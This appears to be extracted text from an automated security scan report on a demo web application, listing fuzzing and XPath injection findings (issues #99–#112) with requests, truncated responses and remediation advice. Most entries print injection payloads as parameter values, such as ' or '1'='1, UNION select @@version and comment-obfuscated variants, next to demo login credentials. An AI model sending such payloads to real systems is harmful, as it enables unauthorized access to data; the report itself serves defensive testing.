window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #99\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@\ndeepfence.ioYaIstgVm\nDemoUser1# EEs0xq4mQ8omj\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #100\nXPath Injection\nXPath Injection Scans work through a list of predefined strings known to present problems for XPath \nparsers, and inserts those strings into the parameters of the request.\nIf an unexpected response is received, this is an indication that input validation has failed to remove \nthe potentially malicious strings from the parameters, and that data should be sanitized before it is \nused to build XPath expressions.\nScan XPath Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io or name(//users/LoginID[1]) = 'LoginID' or 'a'='b\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove XPath tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-643\nIssue Number #101\nScan XPath Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' or '1'='1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove XPath tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-643\nIssue Number #102Scan XPath Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io1/0\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove XPath tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-643\nIssue Number #103\nScan XPath Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io '%20o/**/r%201/0%20--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove XPath tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-643\nIssue Number #104\nScan XPath Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' o/**/r 1/0 --\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove XPath tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-643\nIssue Number #105\nScan XPath Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io;\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove XPath tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-643\nIssue Number #106\nScan XPath Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io '%20and%201=2%20--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove XPath tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-643\nIssue Number #107\nScan XPath Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' and 1=2 --\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove XPath tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-643\nIssue Number #108\nScan XPath Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@deepfence.io test%20UNION%20select%201,%20@@version,%201,\n%201;\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove XPath tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-643\nIssue Number #109\nScan XPath Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io test UNION select 1, @@version, 1, 1;\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove XPath tokens from the contents of the parameter demouser@deepfence.io\nCWE-ID CWE-643\nIssue Number #110\nScan XPath Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# or name(//users/LoginID[1]) = 'LoginID' or 'a'='b\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove XPath tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-643\nIssue Number #111\nScan XPath Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' or '1'='1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove XPath tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-643\nIssue Number #112\nScan XPath Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1/0\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 